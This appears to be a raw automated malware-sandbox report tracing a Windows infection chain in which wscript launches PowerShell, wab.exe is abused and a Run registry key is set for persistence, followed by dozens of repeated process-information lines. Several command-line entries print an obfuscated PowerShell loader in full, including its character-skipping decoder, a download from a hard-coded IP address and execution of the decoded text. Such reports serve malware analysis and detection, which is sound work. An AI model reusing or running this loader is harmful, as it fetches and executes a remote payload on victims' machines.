TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,26_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC3A0952 push E95B66D0h; ret 11_2_00007FFAAC3A09C9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_07C608C2 push eax; mov dword ptr [esp], ecx15_2_07C60AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_07C60AB8 push eax; mov dword ptr [esp], ecx15_2_07C60AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_097403F6 push ss; iretd 15_2_09740419
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0974439A push 8D024F24h; iretd 15_2_097443A3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_09742679 push es; iretd 15_2_0974267A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_09744403 push edx; retf 15_2_09744424
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_09740698 push ebp; ret 15_2_097406B9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044693D push ecx; ret 26_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044DB70 push eax; ret 26_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044DB70 push eax; ret 26_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00451D54 push eax; ret 26_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0044B090 push eax; ret 27_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0044B090 push eax; ret 27_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00451D34 push eax; ret 27_2_00451D41
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00444E71 push ecx; ret 27_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00414060 push eax; ret 28_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00414060 push eax; ret 28_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00414039 push ecx; ret 28_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_004164EB push 0000006Ah; retf 28_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00416553 push 0000006Ah; retf 28_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00416555 push 0000006Ah; retf 28_2_004165C4
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NaergaaendeJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NaergaaendeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,27_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
